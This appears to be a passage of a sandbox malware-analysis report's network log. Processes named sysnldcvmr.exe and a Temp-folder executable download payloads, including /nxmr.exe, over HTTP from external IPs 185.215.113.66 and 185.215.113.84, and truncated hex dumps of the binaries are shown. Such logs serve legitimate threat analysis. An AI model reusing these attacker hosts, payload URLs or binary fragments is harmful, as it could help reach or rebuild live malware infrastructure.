Dec 5, 2024 17:32:05.067692041 CET	1236	IN	Data Raw: 08 01 d1 01 d0 c7 01 53 9c 3a 6e 01 d1 01 d0 c7 01 5d 2f 19 ae 01 d1 01 d0 c7 01 b0 b1 1a e0 01 d1 01 d0 c7 01 80 9d 90 68 01 d1 01 d0 c7 01 55 f1 58 94 01 d1 01 d0 c7 01 6b 1e df 43 01 d1 01 d0 c7 01 a3 8d c7 92 01 d1 01 d0 c7 01 33 2d b7 45 01 Data Ascii: S:n]/hUXkC3-Em~cD$ID*5zk;2E`h<]SFaW_V}
Dec 5, 2024 17:32:05.180608034 CET	1236	IN	Data Raw: 01 90 b8 26 5c 01 d1 01 d0 c7 01 31 69 ab 44 01 d1 01 d0 c7 01 ad 3d 4f d6 01 d1 01 d0 c7 01 60 27 46 71 01 d1 01 d0 c7 01 7d 63 12 3d 01 d1 01 d0 c7 01 0d 4a 5e c0 01 d1 01 d0 c7 01 b2 0b 60 3f 01 d1 01 d0 c7 01 8f ea b4 cd 01 d1 01 d0 c7 01 53 Data Ascii: &\1iD=O`'Fq}c=J^`?S(-3,>2"}bq}2SLr8

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.11	49781	185.215.113.66	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:32:06.041095972 CET	166	OUT	GET /2 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:32:07.374361992 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:32:07 GMT Content-Type: application/octet-stream Content-Length: 10496 Last-Modified: Sun, 20 Oct 2024 18:34:00 GMT Connection: keep-alive ETag: "67154d18-2900" Accept-Ranges: bytes Data Raw: 13 e3 aa 7c f1 40 76 43 29 84 09 02 71 ae 39 fc df 9d fa 02 4b d8 7b 3e ae 0c e2 64 38 f9 d3 27 da 73 10 d1 ca f9 f2 4a f8 ad aa 12 e8 fa c9 50 6e f5 a1 6b 88 56 c2 7a 1f 17 e8 40 57 00 b2 8f df 4c 7b e3 14 75 47 bf 27 47 31 bb 43 4c 8e e7 b4 40 14 db 1d 3c 42 cc e1 36 dc d3 3b 91 3e 68 4d 15 e2 5c e6 98 da 7c 77 03 42 8c 76 ca a5 9a 81 db a1 ec 75 f2 84 a2 67 09 f0 c5 b4 4f 58 86 25 fc 20 b3 68 fa 72 39 3a 7c e0 1b f5 e8 b0 73 b6 f8 3c 81 36 fa 29 81 67 e8 ee 34 47 6c 59 b9 7f 18 32 42 66 14 35 b3 8d e2 41 8d e5 92 2b 47 1f c0 93 b3 28 d8 54 2d 6f 45 f1 c3 5a cf 49 32 33 d3 7b ac a8 27 33 c1 c9 e0 29 60 f9 b3 d3 5e 65 37 6a 7a 2f 4d 24 73 1b 93 bb fa 91 d2 34 ce 9b 19 db d6 2a 31 36 f0 a2 ab 92 6d 08 d9 66 72 6e 07 c5 44 44 2c 9e af ae ce d3 fb 57 61 28 cd 32 90 44 0e c3 39 95 a9 ab 17 e4 0d 16 a5 f0 c2 e3 78 c3 de e1 fa ff 86 d7 ae ab 06 ba 5a 6b 34 44 61 15 d3 b1 85 29 3f 83 f4 5f 68 10 ed 8d d7 73 41 11 b6 57 f3 ed 02 fa a4 42 32 ff 99 d6 ea 0a 63 48 51 ba 54 b5 00 01 83 3d 9e bb 55 dd 93 1c e5 [TRUNCATED] Data Ascii: \|@vC)q9K{>d8'sJPnkVz@WL{uG'G1CL@<B6;>hM\\|wBvugOX% hr9:\|s<6)g4GlY2Bf5A+G(T-oEZI23{'3)`^e7jz/M$s4*16mfrnDD,Wa(2D9xZk4Da)?_hsAWB2cHQT=U@3}!YGCX{ 4"&h0.'xu#c\|gL0)cM]oL{:En:?\|_XPQ@ 3.o)ua[I+fZM% ]2uz_Gwt0bFaMTd2Y&TMXP}+OpQEo6R;P>8`2'"~CZ_,2g $l"x:h;H`$-6_-eC?6T=qL3&fG)WG@6X~%X%RCh?R].fbU!PHh"Rj,dk.e\~hn(,G<u16tlw;p;yrSC_M6XhtG7zsHP,e_ddcn^M+ct\0jr>;_nq>xezw
Dec 5, 2024 17:32:07.374403000 CET	1236	IN	Data Raw: b6 6f 0a 0a 83 25 6b 6b 77 fa e4 46 67 eb d9 41 2f aa 63 53 82 83 51 d9 2f 3d 63 6a 82 33 0b 6f 95 13 e1 9f 36 1b ba cb fb f5 6f 57 bb 40 bd 1d a5 c1 57 98 12 18 b1 98 2c ff 21 39 d5 d8 8c 8b 48 74 d5 8a 79 fc c5 75 bb aa e4 d3 c1 a0 97 29 d7 96 Data Ascii: o%kkwFgA/cSQ/=cj3o6oW@W,!9Htyu)PU:vO'8O>*B aw'&iEpRaMZ\|3Fk<lQ;GbPMlh5}8m;ajW,N7&QK
Dec 5, 2024 17:32:07.374416113 CET	1236	IN	Data Raw: 63 34 74 b5 c2 9f e6 cf 24 40 6d 6d 39 94 34 21 a1 59 32 49 93 8d 45 6f 16 41 e3 3e fb e9 ec 01 f9 89 40 75 7d 84 c1 29 99 2e 8f f9 01 1b d7 e2 f5 ea f5 37 7e 95 c0 87 7f d4 e2 e3 b8 2c a3 95 7b 43 15 a1 69 fe 92 c8 13 e2 7f 5f 3b 68 4b fa 25 e1 Data Ascii: c4t$@mm94!Y2IEoA>@u}).7~,{Ci_;hK%D&kuY'p=/a:NTtKu"1X[8Ibdym-*\|+>a`<Z!%\| 4&[+usL^etpuu);Xb<>M\
Dec 5, 2024 17:32:07.374459982 CET	1236	IN	Data Raw: 0b a6 7d 79 c6 0e 19 41 de 44 a9 03 74 f2 fb a9 92 bc 27 b6 69 9d 42 1a 59 26 6e 6d a8 df 05 cd 7b e6 9c e9 45 0f 67 74 bc 1a e1 59 dd 58 26 67 a8 cb ea 52 87 27 f1 9b fe 95 bd 52 bf 68 3a 2f 74 d5 bc 82 48 3c f6 ef 52 41 bf 9a 2d b2 e4 48 3f 02 Data Ascii: }yADt'iBY&nm{EgtYX&gR'Rh:/tH<RA-H?:3a$8;SUrN1QIuc>"W\|1Rrm]T1&PSTQZqEtgc[U,@+LoR0rMwfu^VUzcie_$eM;B
Dec 5, 2024 17:32:07.374541044 CET	1236	IN	Data Raw: 0e 0b 73 b4 cc 61 72 90 49 03 c9 0c 34 6e 73 ed 3b 3f 45 e7 2a 84 8c 3b 11 6d 21 89 00 60 23 47 8c c2 4b 9e c0 2c d8 47 80 38 fd e5 6a f8 e1 31 10 55 0b 54 d4 89 df 1b da 0d 24 5b 6e ee 18 45 4b 11 59 49 7e 62 cf 22 93 99 ab 6f bd b6 fe 39 0b 36 Data Ascii: sarI4ns;?E;m!`#GK,G8j1UT$[nEKYI~b"o96{'#S(cJK4Hft5U>1uauV\|p8"`;uT;_Ibmppc&D5HCwjrH&532a`#&A
Dec 5, 2024 17:32:07.374552965 CET	1236	IN	Data Raw: 52 57 11 8b 24 3e 89 1b 44 e8 11 27 36 d3 98 6c 64 5f c1 5e 36 d1 aa 50 5a 3a 84 e5 9f 20 97 64 a4 c0 4b 41 9b fa 0a f4 83 09 e0 69 91 cf e7 2c d4 09 d5 e4 18 60 53 3c 4e cb 83 5e 89 f8 2f 97 1b db be 93 32 73 f7 8d f7 65 6f 24 ee f6 74 d5 08 d2 Data Ascii: RW$>D'6ld_^6PZ: dKAi,`S<N^/2seo$tRu@.\]=/E,PX<yu6CIEF`!Ue$u9r;SwjF"dDxsWY/"4\|bob`\|bS
Dec 5, 2024 17:32:07.374667883 CET	1236	IN	Data Raw: b5 f2 e5 56 94 d5 a7 ba 2e 4b ef 19 cb 34 b8 a7 99 e1 80 8c cc c0 91 a1 56 e3 29 95 04 e6 0f b9 a5 86 93 81 fe fb 19 09 f6 66 dc 6a 30 a9 58 e4 78 2d 5f 4e 45 b3 14 af 02 96 da 20 60 39 3e 4b 48 c0 80 cb 76 02 0b 8c c1 87 09 1a bc 98 6d 65 18 af Data Ascii: V.K4V)fj0Xx-_NE `9>KHvme#R]/I{J4],GCrJZ3;:U$=%W&^/UR1i [kkRh1;Cz^DO"j$qQT`r!Q[(7_`E
Dec 5, 2024 17:32:07.374680042 CET	1236	IN	Data Raw: 28 11 af e2 41 9b fa 51 e9 ab d8 2a 79 da ce 15 40 37 b8 70 18 de 0f 5b 95 e6 1e b5 38 1d 61 99 66 96 eb c4 00 1f 65 72 58 fc 2e 42 79 8e 29 b8 e0 15 7b 9e 33 1a 0b 8c e5 49 8f 3e 92 cc 6d 67 59 91 10 68 27 3e 93 f3 d5 fa 1d e9 90 99 e6 46 67 f1 Data Ascii: (AQ*y@7p[8aferX.By){3I>mgYh'>Fg),},([vUl s?u/AsGbrRbV1oLE?fpK`\|cv\}0>jmer^kvrM5uMW~c3FzWSkUM@q
Dec 5, 2024 17:32:07.374692917 CET	873	IN	Data Raw: b7 1b ed 55 22 52 87 a3 c5 38 9f b8 98 95 ff b4 f2 c4 e9 dd 2d 0b 3c 5d 3d 5e 30 5e fd c6 f8 54 b4 2a e8 93 3d a8 1f 7d 5c e5 4d 1d c9 7e cb 06 5c 4c 2c 00 33 bd 10 e0 11 48 3b 01 7b 52 15 1a d2 67 2c a4 26 fc e8 3f 86 7e 08 4f 27 64 b0 a6 1b 25 Data Ascii: U"R8-<]=^0^T*=}\M~\L,3H;{Rg,&?~O'd%`dJU]~Y:\|2Jd-\ Q@n\\|{hYc$P;.s^X"@Nn>$2Y+J@Y},?r`41RmU\gd
Dec 5, 2024 17:32:12.503911018 CET	166	OUT	GET /3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:32:12.945839882 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:32:12 GMT Content-Type: application/octet-stream Content-Length: 55040 Last-Modified: Sat, 30 Nov 2024 15:55:38 GMT Connection: keep-alive ETag: "674b357a-d700" Accept-Ranges: bytes Data Raw: 71 55 bf 68 00 78 5e 05 bf 77 f1 ce 6a 84 34 af 59 54 f4 9a 7f 2e 9e 56 5c 9f 90 cf 88 27 49 60 23 c8 18 58 ef 00 f5 4c be 7d 1c 91 c4 34 02 a2 5c 3c 0d 4e 55 81 f8 05 ac ee cb 01 3b 46 d2 9c 58 e4 0f 57 22 b2 cd 6b b7 cc 33 3f be b9 da e2 c1 f2 64 fc e6 50 f4 9a 92 a5 f5 09 a8 09 a7 c7 da 31 7d 87 96 31 55 a4 1a d0 ba a1 26 ba b8 99 69 1d 33 dc 14 0f 1c 89 01 e6 63 3c 95 aa 53 61 58 04 03 e1 40 77 fb 5f 23 b2 e6 ef 48 bb 0d da b9 71 4f 5c 1b bf 2d 19 31 22 20 7c 90 25 4c a9 42 7c 7d b5 72 c6 73 d7 e6 e2 bc c8 de e2 46 c0 f0 c7 86 98 ef 5b b4 36 d4 af 0f dd d9 cf 96 3a ae 7e 9f c1 2c 54 45 11 30 e9 3e f6 a0 0c 58 a7 ed 3c 7a d4 d4 8e 7e fd 5d 2c a2 dc 17 0f 69 98 fe 29 2d 23 fc 4f a1 61 fb e3 d4 f3 0f 4b b1 33 49 91 45 9f 62 e1 a2 13 f5 5c 5d 8f c4 f6 8b c7 30 c5 0b 16 f6 6f f6 71 a2 69 a7 be c7 a0 ad 0c 22 4b 33 e3 10 dd f4 ad 9d c9 f9 ba 6b 9d 18 b7 b7 99 bf f8 3e bf 51 8f e7 79 e1 e2 02 f7 6b a1 21 e1 93 c9 31 90 95 64 be 3c 55 a3 bc b1 6e 93 47 c8 b4 34 76 3f 40 1c 6f b5 f6 6f e2 0a a6 f3 70 3f [TRUNCATED] Data Ascii: qUhx^wj4YT.V\'I`#XL}4\<NU;FXW"k3?dP1}1U&i3c<SaX@w_#HqO\-1" \|%LB\|}rsF[6:~,TE0>X<z~],i)-#OaK3IEb\]0oqi"K3k>Qyk!1d<UnG4v?@oop?t Q@>VeGy6-:p~w!:zq<\|TwX?Fq)3Pr\|\jFC4wa\|zk9eTG$IFxP!+(Wjv2G6;axnMd<?IA0![eLQ'Ju$%6b$V"2yvRKbPUH!@uQ+Zp,j%nf]k1'+\|~z0g[:e2?zO_X8IhveZ9:iOSgly{`bx6R-bHWhgF[oDzz68lty<}Du56T;,{stYZL1"!hJy^cqVNWAy<I7fo-)m/$f55KqQchAZM,v@O$j ^t)%BlCWv[ZBO8:L=-
Dec 5, 2024 17:32:12.945900917 CET	1236	IN	Data Raw: 5b 45 cd 42 00 1c 84 28 01 50 de 3b 22 91 56 cf e9 a7 2b 5b f3 ba d0 65 3e d9 cc 07 bf 4f ee 6c a9 19 5b ee bb 28 49 cc e1 f2 28 87 3c e0 d7 ff a4 0a 34 6f 49 d4 2a 8b a8 f8 bc 1a 35 e9 59 59 81 c3 15 fd 6e cb be 09 bb e1 99 dc e7 12 87 9c 23 b5 Data Ascii: [EB(P;"V+[e>Ol[(I(<4oI5YYn#XGqenlH=F<S["z{{"lEU7e.6Due0hPD _Bt;%H_bC@97U8,/&U5Ck]ocRO3hW\|
Dec 5, 2024 17:32:12.949743986 CET	1236	IN	Data Raw: 21 40 2e 7a e6 15 b0 99 e8 de ee 46 43 de 03 52 a6 24 16 2a b3 5d d1 a1 7f a1 78 24 78 cf 01 39 d9 7c 1d f8 bc 81 03 92 ba 67 09 de e8 5d f4 fa 51 0c a3 36 e6 93 c9 a6 8d b5 2b 22 59 9a f8 e5 f7 e7 93 69 b0 54 20 09 4a 3a 9e ac 16 cc 15 f9 31 da Data Ascii: !@.zFCR$*]x$x9\|g]Q6+"YiT J:1kYK`coIIe=v)~::N({6I\&6/CBAI_j"s\cUzh{$#F?@yF(~YkV.3T#\|;d!q?+y<pt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.11	49793	185.215.113.84	80	8160	C:\Users\user\AppData\Local\Temp\78476062.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:32:11.855722904 CET	177	OUT	GET /nxmr.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36 Host: 185.215.113.84
Dec 5, 2024 17:32:13.190130949 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:32:12 GMT Content-Type: application/octet-stream Content-Length: 5827584 Last-Modified: Fri, 27 Sep 2024 20:03:46 GMT Connection: keep-alive ETag: "66f70fa2-58ec00" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 b7 01 f7 66 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 94 01 00 00 e8 58 00 00 1e 00 00 b0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 70 59 00 00 04 00 00 91 87 59 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 20 59 00 34 0a 00 00 00 50 59 00 80 03 00 00 00 d0 58 00 58 11 00 00 00 00 00 00 00 00 00 00 00 60 59 00 30 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 b7 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEdf.&X@pYY` Y4PYXX`Y0X("YP.textP``.dataVV@.rdata9X:xX@@.pdataXXX@@.xdataXX@@.bssY.idata4 YX@.CRT`0YX@.tls@YX@.rsrcPYX@.reloc0`YX@B
Dec 5, 2024 17:32:13.190151930 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c3 0f 1f 44 00 00 66 2e 0f 1f 84 00 00 00 00 00 48 83 ec 28 48 8b 05 75 b1 Data Ascii: Df.H(HuX1HvXHyXHXf8MZuHcP<H8PEtfHXXuCqTkHXTkHXdHmX8tI1H(p
Dec 5, 2024 17:32:13.190162897 CET	1236	IN	Data Raw: fd ff ff 89 c1 e8 2b 6d 01 00 90 66 2e 0f 1f 84 00 00 00 00 00 48 83 ec 28 48 8b 05 c5 ac 58 00 c7 00 01 00 00 00 e8 ba fc ff ff 90 90 48 83 c4 28 c3 0f 1f 00 48 83 ec 28 48 8b 05 a5 ac 58 00 c7 00 00 00 00 00 e8 9a fc ff ff 90 90 48 83 c4 28 c3 Data Ascii: +mf.H(HXH(H(HXH(H(lHH(H@HIXHP!HH9uHXHPfHH9uHXHPfHH9uH}XHPfH
Dec 5, 2024 17:32:13.190303087 CET	1236	IN	Data Raw: d6 4c 89 c5 4d 89 cc 48 8d 7c 24 20 41 b8 08 02 00 00 ba 00 00 00 00 48 89 f9 e8 9a 68 01 00 4d 89 e0 48 89 ea 48 89 f9 e8 34 28 00 00 89 f2 48 89 d9 e8 35 fe ff ff 41 89 f0 48 89 da 48 89 f9 e8 c8 35 00 00 90 48 81 c4 30 02 00 00 5b 5e 5f 5d 41 Data Ascii: LMH\|$ AHhMHH4(H5AHH5H0[^_]A\UWVSHH)H$8H$8A6>HH@ HH$0Agf$Pf$R f$Tf$Vf$Xf$Z
Dec 5, 2024 17:32:13.190315008 CET	1236	IN	Data Raw: 7c 01 00 00 67 00 66 c7 84 24 7e 01 00 00 93 00 66 c7 84 24 80 01 00 00 a7 00 66 c7 84 24 82 01 00 00 a6 00 66 c7 84 24 84 01 00 00 ae 00 66 c7 84 24 86 01 00 00 9c 00 66 c7 84 24 88 01 00 00 a9 00 66 c7 84 24 8a 01 00 00 aa 00 66 c7 84 24 8c 01 Data Ascii: \|gf$~f$f$f$f$f$f$f$f$f$f$f$ef$f$f$f$7=Xu<XHXDPfAHH'unXHm=Xt
Dec 5, 2024 17:32:13.190325975 CET	1236	IN	Data Raw: 01 00 00 1a 00 66 c7 84 24 54 01 00 00 36 00 66 c7 84 24 56 01 00 00 30 00 66 c7 84 24 58 01 00 00 3f 00 66 c7 84 24 5a 01 00 00 3c 00 66 c7 84 24 5c 01 00 00 40 00 66 c7 84 24 5e 01 00 00 3c 00 66 c7 84 24 60 01 00 00 33 00 66 c7 84 24 62 01 00 Data Ascii: f$T6f$V0f$X?f$Z<f$\@f$^<f$`3f$bAf$df$f$f$h6f$j;f$l1f$n<f$pDf$r@f$tf$v f$x2f$z0f$\|Bf$~?f$6f$
Dec 5, 2024 17:32:13.190339088 CET	1236	IN	Data Raw: c7 84 24 6a 01 00 00 e0 00 66 c7 84 24 6c 01 00 00 de 00 66 c7 84 24 6e 01 00 00 ef 00 66 c7 84 24 70 01 00 00 ee 00 66 c7 84 24 72 01 00 00 d7 00 66 c7 84 24 74 01 00 00 df 00 66 c7 84 24 76 01 00 00 f5 00 66 c7 84 24 78 01 00 00 e0 00 66 c7 84 Data Ascii: $jf$lf$nf$pf$rf$tf$vf$xf$zf$\|f$~f$f$f$f$f$f${==Xu<xXH0XDPfAHHuXH=<X
Dec 5, 2024 17:32:13.190501928 CET	1236	IN	Data Raw: 0f b7 02 66 2d dd 0c 66 25 ff 00 66 89 02 48 83 c2 02 48 39 d1 75 e9 c6 05 7b d7 58 00 00 66 c7 84 24 50 01 00 00 39 00 66 c7 84 24 52 01 00 00 1f 00 66 c7 84 24 54 01 00 00 3e 00 66 c7 84 24 56 01 00 00 50 00 66 c7 84 24 58 01 00 00 42 00 66 c7 Data Ascii: f-f%fHH9u{Xf$P9f$Rf$T>f$VPf$XBf$Z+f$\>f$^Jf$`Bf$bAf$d,f$f?f$hGf$jBf$l@f$nQf$pPf$r9f$tSf$vIf$xGf
Dec 5, 2024 17:32:13.190514088 CET	1224	IN	Data Raw: d5 58 00 48 8d 4a 12 0f b7 02 66 2d 8d 7a 66 25 ff 00 66 89 02 48 83 c2 02 48 39 ca 75 e9 c6 05 2a d5 58 00 00 48 8d 94 24 20 14 00 00 48 8d 8c 24 50 01 00 00 4c 8d 05 01 d5 58 00 e8 fc 0f 00 00 48 8d 7c 24 60 48 8d 35 c0 65 58 00 b9 e2 00 00 00 Data Ascii: XHJf-zf%fHH9u*XH$ H$PLXH\|$`H5eX=Xu9XHXTD`fAHHquXH,=Xt,HXHf}f%fHH9udXL$PH$ H$Ht$(LD$ LYX
Dec 5, 2024 17:32:13.190526009 CET	1236	IN	Data Raw: 05 40 cf 58 00 e8 6b 0b 00 00 66 c7 44 24 60 76 00 66 c7 44 24 62 a4 00 66 c7 44 24 64 71 00 66 c7 44 24 66 80 00 66 c7 44 24 68 c3 00 66 c7 44 24 6a c6 00 66 c7 44 24 6c bf 00 66 c7 44 24 6e 71 00 66 c7 44 24 70 80 00 66 c7 44 24 72 c5 00 66 c7 Data Ascii: @XkfD$`vfD$bfD$dqfD$ffD$hfD$jfD$lfD$nqfD$pfD$rfD$tfD$vqfD$xsfD$zfD$\|fD$~f$f$f$f$f$f$f$qf$f$f$f$f$f
Dec 5, 2024 17:32:13.310086012 CET	1236	IN	Data Raw: 8d 7a 66 25 ff 00 66 89 02 48 83 c2 02 48 39 ca 75 e9 c6 05 92 d3 58 00 00 48 8d 0d 71 d3 58 00 e8 24 47 01 00 01 c0 66 89 84 24 50 04 00 00 66 c7 44 24 40 dd 00 66 c7 44 24 42 ff 00 66 c7 44 24 44 fc 00 66 c7 44 24 46 03 00 66 c7 44 24 48 f6 00 Data Ascii: zf%fHH9uXHqX$Gf$PfD$@fD$BfD$DfD$FfD$HfD$JfD$LfD$NfD$PfD$RfD$TfD$VfD$X=Xu9XHXTD@fAHHuXH=Xt)HXHJf-zf%fHH

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.11	49800	185.215.113.66	80	7744	C:\Windows\sysnldcvmr.exe

Timestamp	Bytes transferred	Direction	Data
Dec 5, 2024 17:32:14.583940029 CET	166	OUT	GET /3 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Host: 185.215.113.66
Dec 5, 2024 17:32:15.415510893 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 05 Dec 2024 16:32:15 GMT Content-Type: application/octet-stream Content-Length: 55040 Last-Modified: Sat, 30 Nov 2024 15:55:38 GMT Connection: keep-alive ETag: "674b357a-d700" Accept-Ranges: bytes Data Raw: 71 55 bf 68 00 78 5e 05 bf 77 f1 ce 6a 84 34 af 59 54 f4 9a 7f 2e 9e 56 5c 9f 90 cf 88 27 49 60 23 c8 18 58 ef 00 f5 4c be 7d 1c 91 c4 34 02 a2 5c 3c 0d 4e 55 81 f8 05 ac ee cb 01 3b 46 d2 9c 58 e4 0f 57 22 b2 cd 6b b7 cc 33 3f be b9 da e2 c1 f2 64 fc e6 50 f4 9a 92 a5 f5 09 a8 09 a7 c7 da 31 7d 87 96 31 55 a4 1a d0 ba a1 26 ba b8 99 69 1d 33 dc 14 0f 1c 89 01 e6 63 3c 95 aa 53 61 58 04 03 e1 40 77 fb 5f 23 b2 e6 ef 48 bb 0d da b9 71 4f 5c 1b bf 2d 19 31 22 20 7c 90 25 4c a9 42 7c 7d b5 72 c6 73 d7 e6 e2 bc c8 de e2 46 c0 f0 c7 86 98 ef 5b b4 36 d4 af 0f dd d9 cf 96 3a ae 7e 9f c1 2c 54 45 11 30 e9 3e f6 a0 0c 58 a7 ed 3c 7a d4 d4 8e 7e fd 5d 2c a2 dc 17 0f 69 98 fe 29 2d 23 fc 4f a1 61 fb e3 d4 f3 0f 4b b1 33 49 91 45 9f 62 e1 a2 13 f5 5c 5d 8f c4 f6 8b c7 30 c5 0b 16 f6 6f f6 71 a2 69 a7 be c7 a0 ad 0c 22 4b 33 e3 10 dd f4 ad 9d c9 f9 ba 6b 9d 18 b7 b7 99 bf f8 3e bf 51 8f e7 79 e1 e2 02 f7 6b a1 21 e1 93 c9 31 90 95 64 be 3c 55 a3 bc b1 6e 93 47 c8 b4 34 76 3f 40 1c 6f b5 f6 6f e2 0a a6 f3 70 3f [TRUNCATED] Data Ascii: qUhx^wj4YT.V\'I`#XL}4\<NU;FXW"k3?dP1}1U&i3c<SaX@w_#HqO\-1" \|%LB\|}rsF[6:~,TE0>X<z~],i)-#OaK3IEb\]0oqi"K3k>Qyk!1d<UnG4v?@oop?t Q@>VeGy6-:p~w!:zq<\|TwX?Fq)3Pr\|\jFC4wa\|zk9eTG$IFxP!+(Wjv2G6;axnMd<?IA0![eLQ'Ju$%6b$V"2yvRKbPUH!@uQ+Zp,j%nf]k1'+\|~z0g[:e2?zO_X8IhveZ9:iOSgly{`bx6R-bHWhgF[oDzz68lty<}Du56T;,{stYZL1"!hJy^cqVNWAy<I7fo-)m/$f55KqQchAZM,v@O$j ^t)%BlCWv[ZBO8:L=-
Dec 5, 2024 17:32:15.415572882 CET	124	IN	Data Raw: 5b 45 cd 42 00 1c 84 28 01 50 de 3b 22 91 56 cf e9 a7 2b 5b f3 ba d0 65 3e d9 cc 07 bf 4f ee 6c a9 19 5b ee bb 28 49 cc e1 f2 28 87 3c e0 d7 ff a4 0a 34 6f 49 d4 2a 8b a8 f8 bc 1a 35 e9 59 59 81 c3 15 fd 6e cb be 09 bb e1 99 dc e7 12 87 9c 23 b5 Data Ascii: [EB(P;"V+[e>Ol[(I(<4oI*5YYn#XGqenlH=F<S["z{{"
Dec 5, 2024 17:32:15.417004108 CET	1236	IN	Data Raw: 6c fe cd 45 55 b9 8c 37 fb e0 65 e2 c7 a6 e8 ca 2e e7 36 11 cb 44 07 75 cb 65 86 30 68 e9 80 ff a2 f2 50 8d 9f ef f0 d7 88 1a 9c d0 44 c8 07 20 87 df eb 5f aa 42 af 74 3b f3 0f c4 18 25 80 2a b4 f7 48 e6 5f 1a db a2 ab 62 43 40 ea 39 f6 86 e6 0a Data Ascii: lEU7e.6Due0hPD _Bt;%*H_bC@97U8,/&U5Ck]ocRO3hW\|Sz#0#\|)8_wo=`w9rvM$&qfkc];j`PWbOxH2me7q-kAqD_Pk
Dec 5, 2024 17:32:15.417016029 CET	1236	IN	Data Raw: 7b 36 a6 49 ac 18 96 02 5c 26 ff 36 f8 c6 2f da 11 03 0b 43 42 d5 f1 fa 41 49 12 5f 6a f7 0d ab 9c 22 da 0e e6 73 5c a7 63 55 c5 7a be 68 9a 7b ab 24 23 8f b8 90 f1 46 3f dc 40 7f eb fc ff f9 de 79 f0 46 f0 1c bf c3 28 8f 7e 59 df 83 6b 13 f2 9e Data Ascii: {6I\&6/CBAI_j"s\cUzh{$#F?@yF(~YkV.3T#\|;d!q?+y<ptwL(>qvj?}Ip9f&)ta/kkPSHD+$"S$>p\"}q@&}X~{4SSz99)T
Dec 5, 2024 17:32:15.417043924 CET	248	IN	Data Raw: 7b c2 28 ec 12 68 73 af f0 35 fa 92 0d 6e d3 4c 18 d1 e8 8f c4 a1 15 0c 44 f9 b6 78 31 a0 fd 7f 79 99 72 c6 f0 73 47 e9 0f 40 94 99 fb e1 f0 b4 d5 8f 6d d3 2c 32 8b 19 0f 58 f0 2e 41 9c f2 6f 5b 46 89 a3 28 dc 95 c6 72 a2 e2 61 ac 48 43 c4 a9 bc Data Ascii: {(hs5nLDx1yrsG@m,2X.Ao[F(raHC&i/r"j4izzA9cLWIt_h+nLh-=-&vqSO@O<0gm:TtwnKmhmm@A>xa!@ZcI:#u
Dec 5, 2024 17:32:15.419214010 CET	1236	IN	Data Raw: 19 a0 24 4b da 1e 29 2e b8 90 9c 19 04 be a0 c4 89 13 1c 0f aa 93 20 f3 19 9e b4 84 fb e1 14 78 a7 00 52 e2 02 4c b2 23 82 28 ac f5 b8 d9 a2 cf 34 a1 59 dc ee fd 95 3e 18 9b 64 03 51 58 ab bf d0 e1 e3 e5 36 f2 4d fe 5c 19 c0 e8 22 65 10 8a 26 7e Data Ascii: $K). xRL#(4Y>dQX6M\"e&~,r7e>l=U-v"HPC\|)27gJ_nsZ'<!.xRt8HIDE1@P[lZ/\!A"7$yU?&
